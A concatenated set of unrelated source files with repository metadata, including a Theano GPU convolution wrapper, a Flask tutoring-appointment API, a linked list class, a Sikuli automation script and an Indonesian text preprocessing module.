(CRST <= 64 or K <= 64 or (K % 64 == 0 and K % 128 != 0)):
updat_size = "C128_K64"
updat_grid = [0, grid_C128, grid_K64]
updat_block = 128
else:
updat_size = "C128_K128"
updat_grid = [0, grid_C128, grid_K128]
updat_block = 256
if grid_P == 0 or grid_Q == 0:
grid_P = P
grid_Q = Q // 4
# TitanX optimization: make grid multiple of 24 for small grids
# TODO: explore L2 utilization here:
# TODO: add 980, 750, etc optimizations
if nervanagpu._get_sm_count() == 24:
grid_PQ = grid_P * grid_Q
if grid_PQ < 30:
grid_P = 6
grid_Q = 4
elif grid_PQ < 54:
grid_P = 8
grid_Q = 6
elif grid_PQ < 78:
grid_P = 9
grid_Q = 8
elif grid_PQ <= 108:
grid_P = 12
grid_Q = 8
if grid_P >= P: grid_P = P
if grid_Q >= Q: grid_Q = Q
grid_PQ = grid_P * grid_Q
grid_PQM = updat_grid[0] = grid_PQ * M
updat_grid = tuple(updat_grid)
updat_block = (updat_block,1,1)
# precompute the magic numbers and shift amounts for integer division
magic_RST = _magic32(CRST+8, RST)
magic_RS = _magic32(RST+32, RS)
magic_S = _magic32(RS+32, S)
magic_PQ = _magic32(PQM, PQ)
magic_Q = _magic32(PQ, Q)
magic_PQu = _magic32(grid_PQM, grid_PQ)
magic_Qu = _magic32(grid_PQ, grid_Q)
# generate the convolution kernel args for fprop and bprop
kernel_args = _flatten([
N, K, D, H, W, WN, HWN, DHWN,
C, CRST, RST, magic_RST, RS, magic_RS, S, magic_S,
pad_d, pad_h, pad_w, str_d, str_h, str_w,
P, Q, PQ, QN, PQN, MPQN, magic_Q, magic_PQ,
grid_P, grid_Q, grid_PQ])
# update uses slightly different args
update_args = _flatten([
N, K, D, H, W, WN, HWN, DHWN,
C, CRST, RST, magic_RST, RS, magic_RS, S, magic_S,
pad_d, pad_h, pad_w, str_d, str_h, str_w,
P, Q, PQ, QN, PQN, MPQN, magic_Qu, magic_PQu,
grid_P, grid_Q, grid_PQ])
# shared lookup table size
lut_size = (RST // 32 + (RST % 32 != 0)) * 32 * 4
return {
'fprop': (fprop_size, fprop_grid, fprop_block),
'bprop': (bprop_size, bprop_grid, bprop_block),
'updat': (updat_size, updat_grid, updat_block),
'kernel_args': kernel_args,
'update_args': update_args,
'lut_size': lut_size,
'output_size': (M, P, Q),
}
def _conv(settings, A, B, C, alpha=1.0, relu=False, op="fprop"):
"""
Adapted from the nervanagpu code to avoid using the Layer classes.
A lot of copied code!
settings is generated by _compute_kernel_settings().
"""
assert B.dtype == C.dtype == np.float32
assert op in ["fprop", "bprop", "updat"]
clss = "sconv" # hardcode fp32 for now
flags = 0
if C.rounding:
flags |= 1
if relu:
flags |= 2
# find the correct settings for this operation
size, grid, block = settings[op]
if op in ["fprop", "bprop"]:
args = settings['kernel_args']
shared = settings['lut_size']
elif op == "updat":
args = settings['update_args']
shared = 0
kernel = nervanagpu._get_conv_kernel(lib.cubin_path, clss, op, size)
params = [grid, block, nervanagpu._get_rand_state(),
C.gpudata, A.gpudata, B.gpudata,
alpha, flags]
params.extend(args)
kernel.prepared_call(*params, shared_size=shared)
class NervanaConvBase(NervanaOp):
__props__ = ('padding', 'strides')
def __init__(self, padding=(0, 0, 0), strides=(0, 0, 0)):
self.padding = padding
self.strides = strides
class NervanaConv(NervanaConvBase):
def make_node(self, img, kern):
img = cuda.basic_ops.gpu_contiguous(
cuda.basic_ops.as_cuda_ndarray_variable(img))
kern = cuda.basic_ops.gpu_contiguous(
cuda.basic_ops.as_cuda_ndarray_variable(kern))
if img.type.ndim != 5:
raise TypeError('img must be 5D tensor')
if kern.type.ndim != 5:
raise TypeError('kern must be 5D tensor')
broadcastable = [kern.type.broadcastable[-1], False, False, False, img.type.broadcastable[-1]]
return theano.Apply(self, [img, kern], [cuda.CudaNdarrayType(broadcastable)()])
def make_thunk(self, node, storage_map, _, _2):
inputs = [storage_map[v] for v in node.inputs]
outputs = [storage_map[v] for v in node.outputs]
bottom, weights = inputs
top, = outputs
settings_shapes = [None]
settings = [None]
def thunk():
bottom_shape = bottom[0].shape
weights_shape = weights[0].shape
C , D, H, W, N = bottom_shape
C_, T, R, S, K = weights_shape
if self.padding == 'valid':
pad_d, pad_h, pad_w = 0, 0, 0
elif self.padding == 'full':
pad_d, pad_h, pad_w = T - 1, R - 1, S - 1
elif self.padding == 'half':
pad_d, pad_h, pad_w = T // 2, R // 2, S // 2
else:
pad_d, pad_h, pad_w = self.padding
str_d, str_h, str_w = self.strides
assert C_ == C
if (settings_shapes[0] is None or
settings_shapes[0] != (N, C, K, D, H, W, T, R, S)):
# shape change, recompute settings
settings_shapes[0] = (N, C, K, D, H, W, T, R, S)
settings[0] = _compute_kernel_settings(N, C, K,
D, H, W,
T, R, S,
pad_d, pad_h, pad_w,
str_d, str_h, str_w)
top_shape = (K,) + settings[0]['output_size'] + (N,)
# only allocate if there is no previous allocation of the right size.
if top[0] is None or top[0].shape != top_shape:
top[0] = cuda.CudaNdarray.zeros(top_shape)
bottom_nervana = to_gputensor(bottom[0])
weights_nervana = to_gputensor(weights[0])
top_nervana = to_gputensor(top[0])
_conv(settings[0], bottom_nervana, weights_nervana, top_nervana,
alpha=1.0, relu=False, op="fprop")
thunk.inputs = inputs
thunk.outputs = outputs
thunk.lazy = False
return thunk
def grad(self, inp, grads):
bottom, weights = inp
top, = grads
top = gpu_contiguous(top)
d_bottom = NervanaConvGradI(self.padding, self.strides)(weights, top, bottom.shape[1:-1])
d_weights = NervanaConvGradW(self.padding, self.strides)(bottom, top, weights.shape[1:-1])
return d_bottom, d_weights
class NervanaConvGradI(NervanaConvBase):
def make_node(self, kern, topgrad, shape):
kern = cuda.basic_ops.as_cuda_ndarray_variable(kern)
topgrad = cuda.basic_ops.as_cuda_ndarray_variable(topgrad)
if kern.type.ndim != 5:
raise TypeError('kern must be 5D tensor')
if topgrad.type.ndim != 5:
raise TypeError('topgrad must be 5D tensor')
depth_height_width = [shape[0], shape[1], shape[2]]
broadcastable = [kern.type.broadcastable[0], False, False, False, topgrad.type.broadcastable[-1]]
return theano.Apply(self, [kern, topgrad] + depth_height_width, [cuda.CudaNdarrayType(broadcastable)()])
def make_thunk(self, node, storage_map, _, _2):
inputs = [storage_map[v] for v in node.inputs]
outputs = [storage_map[v] for v in node.outputs]
weights, top = inputs[:2]
bottom, = outputs
settings_shapes = [None]
settings = [None]
def thunk():
weights_shape = weights[0].shape
top_shape = top[0].shape
D, H, W = int(inputs[2][0]), int(inputs[3][0]), int(inputs[4][0])
C, T, R, S, K = weights_shape
K_, M, P, Q, N = top_shape
if self.padding == 'valid':
pad_d, pad_h, pad_w = 0, 0, 0
elif self.padding == 'full':
pad_d, pad_h, pad_w = T - 1, R - 1, S - 1
elif self.padding == 'half':
pad_d, pad_h, pad_w = T // 2, R // 2, S // 2
else:
pad_d, pad_h, pad_w = self.padding
str_d, str_h, str_w = self.strides
assert K_ == K
if (settings_shapes[0] is None or
settings_shapes[0] != (N, C, K, D, H, W, T, R, S)):
# shape change, recompute settings
settings_shapes[0] = (N, C, K, D, H, W, T, R, S)
settings[0] = _compute_kernel_settings(N, C, K,
D, H, W,
T, R, S,
pad_d, pad_h, pad_w,
str_d, str_h, str_w)
bottom_shape = (C, D, H, W, N)
# only allocate if there is no previous allocation of the right size.
if bottom[0] is None or bottom[0].shape != bottom_shape:
bottom[0] = cuda.CudaNdarray.zeros(bottom_shape)
bottom_nervana = to_gputensor(bottom[0])
weights_nervana = to_gputensor(weights[0])
top_nervana = to_gputensor(top[0])
_conv(settings[0], weights_nervana, top_nervana, bottom_nervana,
alpha=1.0, relu=False, op="bprop")
thunk.inputs = inputs
thunk.outputs = outputs
thunk.lazy = False
return thunk
class NervanaConvGradW(NervanaConvBase):
def make_node(self, img, topgrad, shape):
img = cuda.basic_ops.as_cuda_ndarray_variable(img)
topgrad = cuda.basic_ops.as_cuda_ndarray_variable(topgrad)
if img.type.ndim != 5:
raise TypeError('img must be 5D tensor')
if topgrad.type.ndim != 5:
raise TypeError('topgrad must be 5D tensor')
depth_height_width = [shape[0], shape[1], shape[2]]
broadcastable = [img.type.broadcastable[0], False, False, False, topgrad.type.broadcastable[0]]
return theano.Apply(self, [img, topgrad] + depth_height_width, [cuda.CudaNdarrayType(broadcastable)()])
def make_thunk(self, node, storage_map, _, _2):
inputs = [storage_map[v] for v in node.inputs]
outputs = [storage_map[v] for v in node.outputs]
bottom, top = inputs[:2]
weights, = outputs
settings_shapes = [None]
settings = [None]
def thunk():
bottom_shape = bottom[0].shape
top_shape = top[0].shape
T, R, S = int(inputs[2][0]), int(inputs[3][0]), int(inputs[4][0])
C , D, H, W, N = bottom_shape
K, M, P, Q, N_ = top_shape
if self.padding == 'valid':
pad_d, pad_h, pad_w = 0, 0, 0
elif self.padding == 'full':
pad_d, pad_h, pad_w = T - 1, R - 1, S - 1
elif self.padding == 'half':
pad_d, pad_h, pad_w = T // 2, R // 2, S // 2
else:
pad_d, pad_h, pad_w = self.padding
str_d, str_h, str_w = self.strides
assert N_ == N
if (settings_shapes[0] is None or
settings_shapes[0] != (N, C, K, D, H, W, T, R, S)):
# shape change, recompute settings
settings_shapes[0] = (N, C, K, D, H, W, T, R, S)
settings[0] = _compute_kernel_settings(N, C, K,
D, H, W,
T, R, S,
pad_d, pad_h, pad_w,
str_d, str_h, str_w)
weights_shape = (C, T, R, S, K)
# only allocate if there is no previous allocation of the right size.
if weights[0] is None or weights[0].shape != weights_shape:
weights[0] = cuda.CudaNdarray.zeros(weights_shape)
bottom_nervana = to_gputensor(bottom[0])
weights_nervana = to_gputensor(weights[0])
top_nervana = to_gputensor(top[0])
_conv(settings[0], bottom_nervana, top_nervana, weights_nervana,
alpha=1.0, relu=False, op="updat")
thunk.inputs = inputs
thunk.outputs = outputs
thunk.lazy = False
return thunk
# TODO: test how much of a problem the dimshuffles are in a real network (does Theano avoid copy operations? It seems like it does for the cuda-convnet wrappers...)
# TODO: implement an optimization to swap it in so T.nnet.conv.conv2d can be used?
# TODO: built in relu support (with optimization to enable it?)
def nervana_conv(input, filters, padding=None, strides=1, dimshuffle=True):
ndim = input.ndim
if ndim not in [3, 4, 5]:
raise RuntimeError("inputs should be 3D, 4D or 5D")
if ndim != filters.ndim:
raise RuntimeError("inputs and filters should have the same dimensionality")
cdim = ndim - 2 # actual convolution dimensionality
# modify padding and strides tuples for 3D convolution
if isinstance(padding, str):
if padding == "same":
padding = "half"
assert padding in ['full', 'valid', 'half']
else:
if isinstance(padding, int):
padding = (padding,) * cdim
elif isinstance(padding, tuple):
assert len(padding) == cdim
padding = ((0,) * (3 - cdim)) + padding
if isinstance(strides, int):
strides = (strides,) * cdim
elif isinstance(strides, tuple):
assert len(strides) == cdim
strides = ((1,) * (3 - cdim)) + strides
if dimshuffle:
axes = range(1, ndim) + [0]
input = input.dimshuffle(*axes)
filters = filters.dimshuffle(*axes)
# go from ndim dimensions to 5 dimensions by 1-padding
if ndim == 3:
new_input_shape = (input.shape[0], 1, 1, input.shape[1], input.shape[2])
new_filters_shape = (filters.shape[0], 1, 1, filters.shape[1], filters.shape[2])
elif ndim == 4:
new_input_shape = (input.shape[0], 1, input.shape[1], input.shape[2], input.shape[3])
new_filters_shape = (filters.shape[0], 1, filters.shape[1], filters.shape[2], filters.shape[3])
elif ndim == 5:
new_input_shape = input.shape
new_filters_shape = filters.shape
input = input.reshape(new_input_shape)
filters = filters.reshape(new_filters_shape)
op = NervanaConv(padding=padding, strides=strides)
out = op(input, filters)
# go from 5 dimensions back to ndim dimensions by removing the added ones
# using dimshuffle and slicing for this instead leads to hard-to-debug errors
if ndim == 3:
new_out_shape = (out.shape[0], out.shape[3], out.shape[4])
elif ndim == 4:
new_out_shape = (out.shape[0], out.shape[2], out.shape[3], out.shape[4])
elif ndim == 5:
new_out_shape = out.shape
out = out.reshape(new_out_shape)
if dimshuffle:
axes = [ndim - 1] + range(0, ndim - 1)
out = out.dimshuffle(*axes)
return out
if __name__ == "__main__":
import theano.tensor as T
from theano.sandbox.cuda import dnn
input_shape = (128, 8, 96, 96)
filter_shape = (64, 8, 3, 3)
padding = "valid" # (1, 1)
strides = (1, 1)
# input_shape = (32, 16, 48, 48)
# filter_shape = (24, 16, 3, 3)
# padding = (1, 1)
# strides = (1, 1)
print "fprop"
x = theano.shared(np.random.normal(0, 1, input_shape).astype(theano.config.floatX))
w = theano.shared(np.random.normal(0, 1, filter_shape).astype(theano.config.floatX))
y_cudnn = dnn.dnn_conv(x, w, border_mode=padding, subsample=strides, conv_mode='cross')
y_nervana_raw = nervana_conv(x, w, padding=padding, strides=strides)
y_nervana = gpu_from_host(y_nervana_raw)
val_cudnn = np.array(y_cudnn.eval())
val_nervana = np.array(y_nervana.eval())
assert np.allclose(val_cudnn, val_nervana)
print "fprop without dimshuffle"
x_nodimshuffle = theano.shared(x.get_value().transpose(1, 2, 3, 0)) # c01b
w_nodimshuffle = theano.shared(w.get_value().transpose(1, 2, 3, 0)) # c01b
y_nervana_nodimshuffle = gpu_from_host(nervana_conv(x_nodimshuffle, w_nodimshuffle, padding=padding, strides=strides, dimshuffle=False))
val_nervana_nodimshuffle = np.array(y_nervana_nodimshuffle.eval()).transpose(3, 0, 1, 2)
assert np.allclose(val_nervana, val_nervana_nodimshuffle)
print "backprop inputs"
gi_cudnn = T.grad(T.mean(y_cudnn**2), x)
gi_nervana = T.grad(T.mean(y_nervana_raw**2), x)
gival_cudnn = np.array(gi_cudnn.eval())
gival_nervana = np.array(gi_nervana.eval())
assert np.allclose(gival_cudnn, gival_nervana)
print "backprop weights"
gw_cudnn = T.grad(T.mean(y_cudnn**2), w)
gw_nervana = T.grad(T.mean(y_nervana_raw**2), w)
gwval_cudnn = np.array(gw_cudnn.eval())
gwval_nervana = np.array(gw_nervana.eval())
assert np.allclose(gwval_cudnn, gwval_nervana)
# %timeit y_cudnn.eval() -> 47.0 ms
# %timeit y_nervana.eval() -> 61.3 ms
# %timeit y_nervana_nodimshuffle.eval() -> 23.6 ms
|
[
"sanderdieleman@gmail.com"
] |
sanderdieleman@gmail.com
|
7aa212786905e87c1e1736fc67737d33fa121905
|
f163960d077a4217ec54f16f5b1e61b3a6edcce4
|
/venv/bin/gunicorn_paster
|
228b70966bbd81c44f4289a7e5051522bc9b2a0e
|
[] |
no_license
|
drj17/league_tracker
|
a020c3fc7ae4c2405f56ffbccff9f06e0f4c7377
|
6bac3b9e88cb5d7a53b80b34c2557d226ed8c711
|
refs/heads/master
| 2021-05-08T09:40:29.027473
| 2017-10-25T20:49:47
| 2017-10-25T20:49:47
| 107,171,980
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 256
|
#!/Users/davidjanas/league-tracker/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from gunicorn.app.pasterapp import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run())
|
[
"davidjanasr@gmail.com"
] |
davidjanasr@gmail.com
|
|
7a90c5b9dec84a9caa29ff8fbc9d4e6bce5d1cc6
|
48446536f9d89dedcc2e0e2f68dea99526b66e37
|
/structure/DoublyLinkedList.py
|
493289a9cede0d970c6e0473eaec236052421c6b
|
[
"MIT"
] |
permissive
|
Jaidev810/Data-Structures-package
|
24e3dcaba6a440a858b7bbe6d126d3c661c8e115
|
f651615275817f182662892b2b57b200310d3dba
|
refs/heads/main
| 2023-03-02T16:02:09.974413
| 2021-02-15T16:37:08
| 2021-02-15T16:37:08
| 336,035,126
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,276
|
py
|
class Node:
def __init__(self, val: int):
self.val = val
self.prev = None
self.next = None
class DoublyLinkedList:
def takeinput(self) -> Node:
inputlist = [int(x) for x in input().split()]
head = None
temp = None
for curr in inputlist:
if curr == -1:
break
Newnode = Node(curr)
if head is None:
head = Newnode
temp = head
else:
temp.next = Newnode
Newnode.prev = temp
temp = temp.next
return head
def printLL(self, head: Node) -> None:
temp = head
while temp is not None:
print(temp.val, end='->')
temp = temp.next
print("None")
def getLength(self, head: Node) -> int:
count = 0
temp = head
while temp is not None:
count += 1
temp = temp.next
return temp
def getMiddle(self, head: Node) -> int:
slow = head
fast = head
while fast and fast.next is not None:
slow = slow.next
fast = fast.next.next
return slow.val
def reverseLL(self, head: Node) -> Node:
pass
|
[
"jaidevchaudhary810@gmail.com"
] |
jaidevchaudhary810@gmail.com
|
f2e9d57da8c25b307fc6615d861bd06423993923
|
06927b2c6ab0ac9fbf2746ea38a32eb974a57690
|
/ConfTool_Open.sikuli/ConfTool_Open.py
|
18e3372be86df8c4f5e984e2bd8d022c50470ce7
|
[] |
no_license
|
OldFeelLee/sikuliProject
|
ad104a1b0d70ce177150052aed663e8d0c842e02
|
8941cab54131638894c8852eb43129b6bfa84f54
|
refs/heads/master
| 2020-03-15T06:12:53.409283
| 2018-10-30T00:45:05
| 2018-10-30T00:45:05
| 132,002,509
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 452
|
py
|
from sikuli import *
import datetime
import string
import errorConst
import currentTime
import fileLog
import existsFunc
def ConfToolOpen():
fileLog.status = "ConfToolOpen"
App.open("C:\IDIS Solution Suite\Client\G2ProblemReporter.exe")
wait(5)
existsFunc.whileNotExsits_type("1524447598736.png","1524447609584.png",Key.ENTER)
wait(2)
existsFunc.whileNotExists("1524447630007.png","1524447634504.png")
fileLog.status = None
|
[
"leehunpill@idis.co.kr"
] |
leehunpill@idis.co.kr
|
951b8e0db40b2e770368adcadb51d50a6816d639
|
2fc7fab5bda38404588f066da9501cd53e0b3c12
|
/app/posts/schemas.py
|
d83fcae42ed082caa940f8c66f653ca3f07b26e4
|
[
"MIT"
] |
permissive
|
UKnowWhoIm/FastAPI-Blog
|
356c8a9e4ce846a43790da0d48e483d800d45b51
|
e0f9653b6fdbe445148b6e0789da49515f3fd87d
|
refs/heads/main
| 2023-02-03T10:44:23.240562
| 2020-12-21T03:35:50
| 2020-12-21T03:35:50
| 322,341,001
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 354
|
py
|
from datetime import datetime
from typing import Optional
from pydantic import BaseModel
class PostBase(BaseModel):
title: str
content: str
class PostCreate(PostBase):
pass
class Post(PostBase):
uid: int
time_stamp: datetime
author_uid: int
class Config:
orm_mode = True
class PostUpdate(PostBase):
pass
|
[
"51323747+UKnowWhoIm@users.noreply.github.com"
] |
51323747+UKnowWhoIm@users.noreply.github.com
|
7633c1f6a8146068706af993e1f18e6d41fd56be
|
b5ce03fad3c14b07e8ded6258716eb63a8ba1525
|
/.history/app_20210908045601.py
|
86d2750206c06c77130c8c846c3fa950a886a04d
|
[] |
no_license
|
saraalmuraytib/FSND-Capstone-Project
|
0d70058a080d3d91004e7d8bfbf38dfd3f9092fc
|
4a18217c7aa83899cc3f134c6caa710a2521a8fd
|
refs/heads/main
| 2023-07-28T01:20:03.838641
| 2021-09-10T01:33:26
| 2021-09-10T01:33:26
| 402,197,885
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,132
|
py
|
'''
* General Specifications *
** Models will include at least…
* Two classes with primary keys at at least two attributes each
* [Optional but encouraged] One-to-many or many-to-many relationships between classes
** Endpoints will include at least…
* Two GET requests --> Get Subjects, Get Tutors based on selected Subject
* One POST request -->
* One PATCH request -->
* One DELETE request -->
** Roles will include at least…
* Two roles with different permissions -->
* Permissions specified for all endpoints
** Tests will include at least….
* One test for success behavior of each endpoint
* One test for error behavior of each endpoint
* At least two tests of RBAC for each role
'''
import os
from flask import Flask, request, abort, jsonify,render_template
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
#------------------------
from Database.models import *
# create and configure the app
app = Flask(__name__)
CORS(app)
setup_db(app)
Migrate(app, db)
'''
!! NOTE THIS WILL DROP ALL RECORDS AND START YOUR DB FROM SCRATCH
!! NOTE THIS MUST BE UNCOMMENTED ON FIRST RUN
!! Running this funciton will add one
'''
#db_drop_and_create_all()
#----------------------- ROUTES -----------------------
#-------------------- Get Requests --------------------
@app.route('/', methods=['GET'])
def index():
return '<h1>Welcome to Virtual Tutor</h1>'
'''
GET /subject
it should be a public endpoint
returns status code 200 and json {"success": True, "subjects": subjects }
'''
@app.route('/subjects')
def get_subjects():
subjects = Subject.query.all()
if len(subjects) == 0:
abort(404)
return jsonify({
'success': True,
'Subjects': {subject.id: subject.name for subject in subjects}
})
'''
GET /subjects/<int:subject_id>/tutors
it should get tutors based on subject.
'''
@app.route('/subjects/<int:subject_id>/tutors', methods=['GET'])
def get_tutors_based_on_subject(subject_id):
subject = Subject.query.filter(Subject.id == subject_id).one_or_none()
if subject is None:
abort(404)
else:
tutors = Tutor.query.filter(Tutor.subject_id == str(subject_id)).all()
return jsonify({
'success': True,
'Tutors': [tutor.format() for tutor in tutors],
'total_Tutor': len(tutors),
'Subject': subject.name
})
@app.route('/tutor/<int:tutor_id>/appointments', methods=['GET'])
def get_appointments_tutor(tutor_id):
tutor = Tutor.query.filter(Tutor.id == tutor_id).one_or_none()
if tutor is None:
abort(404)
else:
appointments = Appointments.query.filter(
Appointments.tutor_id == str(tutor_id)).all()
if len(appointments) == 0:
return jsonify({
'success': True,
'Total Appointments': len(appointments)
})
else:
upcoming_appointments = []
for appointment in tutor.upcoming_appointments:
student = Student.query.get(appointment.student_id)
upcoming_appointments.append({
'Appointment ID': appointment.id,
"Student ID": appointment.student_id,
"Student name": student.name,
'Start Time': appointment.start_time,
'Duration in minutes': appointment.duration,
'confirmation': "Confirmed" if appointment.confirmation in (True, 't', 'True') else "Not Confirmed"
})
return jsonify({
'success': True,
'Total Appointments': len(appointments),
'Total of Upcoming Appointments': tutor.num_upcoming_appointments,
'Upcoming Appointments': upcoming_appointments
})
@app.route('/student/<int:student_id>/appointments', methods=['GET'])
def get_appointments_student(student_id):
student = Student.query.filter(Student.id == student_id).one_or_none()
if student is None:
abort(404)
else:
appointments = Appointments.query.filter(
Appointments.student_id == str(student_id)).all()
if len(appointments) == 0:
return jsonify({
'success': True,
'Total Appointments': len(appointments)
})
else:
upcoming_appointments = []
for appointment in student.upcoming_appointments:
tutor = Tutor.query.get(appointment.tutor_id)
upcoming_appointments.append({
'Appointment ID': appointment.id,
"Tutor ID": appointment.student_id,
"Tutor name": tutor.name,
'Start Time': appointment.start_time,
'Duration in minutes': appointment.duration,
'confirmation': "Confirmed" if appointment.confirmation in (True, 't', 'True') else "Not Confirmed"
})
return jsonify({
'success': True,
'Total Appointments': len(appointments),
'Total of Upcoming Appointments': student.num_upcoming_appointments,
'Upcoming Appointments': upcoming_appointments
})
#-------------------- POST Requests --------------------
#-------------------- PATCH Requests --------------------
@app.route("/appointments/edit/<int:appointment_id>", methods=['PATCH'])
def update_appointment(appointment_id):
appointment = Appointments.query.filter(Appointments.id == appointment_id).one_or_none()
if appointment is None:
abort(404)
else:
try:
body = request.get_json()
confirmation = body.get('confirmation')
appointment.confirmation = confirmation
appointment.update()
return jsonify({
'success': True,
'Appointment Confirmation': "Confirmed" if appointment.confirmation in (True, 't', 'True') else "Not Confirmed"
})
except:
abort(422)
if __name__ == '__main__':
app.run()
|
[
"sara.almuraytib@gmail.com"
] |
sara.almuraytib@gmail.com
|
1f7b7c84b648f677e41fb961d41caf32532e5770
|
369119ec54d3283fcea79f1c483ccf9d93269820
|
/processDocx.py
|
c05e2914cf5edcc035898764b5ef1bdad77a86c2
|
[] |
no_license
|
fafargamer/BackendAI
|
fe2d08a92c78f5e6975b610b52b4e91b73ea97a2
|
1450a1c6774f29c6363e4030c4892c90dd9b0a2e
|
refs/heads/master
| 2023-05-12T17:32:00.667538
| 2021-06-01T00:37:38
| 2021-06-01T00:37:38
| 370,993,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,597
|
py
|
import urllib
import spacy
import requests
import string
import docx
import io
import numpy as np
from nltk.tokenize import RegexpTokenizer
from string import digits
from docx import Document #pip install python-docx
import PyPDF2 #pip install PyPDF2
# import StopWordRemoverFactory class
from Sastrawi.StopWordRemover.StopWordRemoverFactory import StopWordRemoverFactory, StopWordRemover, ArrayDictionary #pip install Sastrawi
from Sastrawi.Stemmer.StemmerFactory import StemmerFactory
from stopwords import more_stopword as more_St
from stopwords import extra_stopword as extra_St
from stopwords import konjungsi as konjungsi
factory = StopWordRemoverFactory()
# factoryStem = StemmerFactory()
# stopword = factory.create_stop_word_remover()
# stemmer = factoryStem.create_stemmer()
import re # impor modul regular expression
# Ambil Stopword bawaan
stop_factory = StopWordRemoverFactory().get_stop_words()
# Merge stopword
data = stop_factory + more_St + konjungsi
dictionary = ArrayDictionary(data)
stopword = StopWordRemover(dictionary)
def processDocxParagraph(document):
# global texts
# document=requests.get(inputUrl, allow_redirects=True)
document=Document(io.BytesIO(document.content))
document.save('test.docx')
document = docx.Document('test.docx')
documentArray=[]
pureDocumentArray=[]
for paragraph in document.paragraphs:
if(len(paragraph.text)==1):
print(paragraph.text)
if(len(paragraph.text)>0 and paragraph.text != " "):
paragraph.text = paragraph.text.replace('\u2013', '-')
paragraph.text = paragraph.text.replace('\u00a0', '')
# newText = newText.replace('\u00a0', '')
documentArray.append(paragraph.text)
# pureDocumentArray.append(paragraph.text)
#catatan :
# \u2013 = -
# \u201c = " (depan)
# \u201d = " (belakang)
result = []
s=""
for i in range(len(documentArray)):
text = []
for j in range(len(documentArray[i])):
tokenizer = RegexpTokenizer(r'\w+')
textsTokenized=tokenizer.tokenize(documentArray[i][j])
if(len(textsTokenized) < 1):
textsTokenized = [' ']
text.append(textsTokenized[0])
textor = s.join(text)
textor = textor.lower()
textor = stopword.remove(textor)
# textor = stemmer.stem(textor)
textor = re.sub(r"\d+", "", textor)
result.append(textor)
dividedDocument = []
dividedPure = []
print('Document Processed')
divisor = 1
if len(result) > 255:
# print(len(result))
# print('Dokumen dapat dibagi 5')
document_split = np.array_split(result, int(len(result)/(divisor*64)))
pure_split = np.array_split(documentArray, int(len(documentArray)/(divisor*64)))
print(document_split[0])
print(pure_split[0])
# print(document_split)
for i in range(len(document_split)):
# print("Part : {}".format(pure_split[i]))
joinedDocument = ' '.join(document_split[i])
joinedPure = ' '.join(pure_split[i])
dividedDocument.append(joinedDocument)
dividedPure.append(joinedPure)
result = dividedDocument
documentArray = dividedPure
elif len(result) > 127:
# print(len(result))
# print('Dokumen dapat dibagi 5')
document_split = np.array_split(result, int(len(result)/(divisor*32)))
pure_split = np.array_split(documentArray, int(len(documentArray)/(divisor*32)))
print(document_split[0])
print(pure_split[0])
# print(document_split)
for i in range(len(document_split)):
# print("Part : {}".format(pure_split[i]))
joinedDocument = ' '.join(document_split[i])
joinedPure = ' '.join(pure_split[i])
dividedDocument.append(joinedDocument)
dividedPure.append(joinedPure)
result = dividedDocument
documentArray = dividedPure
elif len(result) > 63:
# print(len(result))
# print('Dokumen dapat dibagi 5')
document_split = np.array_split(result, int(len(result)/(divisor*16)))
pure_split = np.array_split(documentArray, int(len(documentArray)/(divisor*16)))
print(document_split[0])
print(pure_split[0])
# print(document_split)
for i in range(len(document_split)):
# print("Part : {}".format(pure_split[i]))
joinedDocument = ' '.join(document_split[i])
joinedPure = ' '.join(pure_split[i])
dividedDocument.append(joinedDocument)
dividedPure.append(joinedPure)
result = dividedDocument
documentArray = dividedPure
elif len(result) > 31:
# print(len(result))
# print('Dokumen dapat dibagi 5')
document_split = np.array_split(result, int(len(result)/(divisor*8)))
pure_split = np.array_split(documentArray, int(len(documentArray)/(divisor*8)))
# print(document_split[0])
# print(pure_split[0])
# print(document_split)
for i in range(len(document_split)):
# print("Part : {}".format(pure_split[i]))
joinedDocument = ' '.join(document_split[i])
joinedPure = ' '.join(pure_split[i])
dividedDocument.append(joinedDocument)
dividedPure.append(joinedPure)
result = dividedDocument
documentArray = dividedPure
elif len(result) > 15:
# print(len(result))
# print('Dokumen dapat dibagi 5')
document_split = np.array_split(result, int(len(result)/(divisor*4)))
pure_split = np.array_split(documentArray, int(len(documentArray)/(divisor*4)))
print(document_split[0])
print(pure_split[0])
# print(document_split)
for i in range(len(document_split)):
# print("Part : {}".format(pure_split[i]))
joinedDocument = ' '.join(document_split[i])
joinedPure = ' '.join(pure_split[i])
dividedDocument.append(joinedDocument)
dividedPure.append(joinedPure)
result = dividedDocument
documentArray = dividedPure
elif len(result) > 7:
# print(len(result))
# print('Dokumen dapat dibagi 5')
document_split = np.array_split(result, int(len(result)/(divisor*2)))
pure_split = np.array_split(documentArray, int(len(documentArray)/divisor*2))
# print(document_split)
for i in range(len(document_split)):
# print("Part : {}".format(pure_split[i]))
joinedDocument = ' '.join(document_split[i])
joinedPure = ' '.join(pure_split[i])
dividedDocument.append(joinedDocument)
dividedPure.append(joinedPure)
result = dividedDocument
documentArray = dividedPure
return documentArray, result
|
[
"68151749+fafargamer@users.noreply.github.com"
] |
68151749+fafargamer@users.noreply.github.com
|
06acbf8dd5987d52c3b7c09269cc36980fb87b0a
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Projects/pyinstaller/build/lib/PyInstaller/hooks/hook-pyexcelerate.Writer.py
|
7ba728e75020705ce49da0686e9c8f3f40fcd2a6
|
[
"LicenseRef-scancode-other-permissive"
] |
permissive
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
